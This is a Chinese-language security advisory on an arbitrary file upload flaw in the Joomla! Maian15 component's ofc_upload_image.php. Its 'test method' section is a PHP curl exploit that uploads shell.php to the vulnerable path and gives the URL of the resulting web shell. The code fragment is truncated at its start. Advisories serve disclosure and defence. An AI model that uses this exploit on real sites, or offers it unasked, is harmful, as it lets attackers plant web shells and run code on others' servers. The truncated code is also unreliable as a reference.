漏洞起因
输入验证错误
危险等级
中
影响系统
Joomla! Maian15
不受影响系统
危害
远程攻击者可以利用漏洞可上传任意文件并执行。
CVSSv2:
攻击所需条件
攻击者必须访问Joomla! Maian15。
漏洞信息
Joomla!是一套在国外相当知名的内容管理系统。
Joomla! Maian15组件’charts/php-ofc-library/ofc_upload_image.php’不正确校验用户提交的上传请求,允许攻击者利用漏洞上传任意PHP文件并以WEB权限执行。
测试方法
“;
$ch =
curl_init(“http://www.example.com/path/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=shell.php”);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>
Shell =
http://www.example.com/path/administrator/components/com_maian15/charts/tmp-upload-images/shell.php
安全建议
厂商解决方案
目前没有详细解决方案提供:
http://www.joomla.org/
漏洞提供者
SultanHaikal
评论关闭。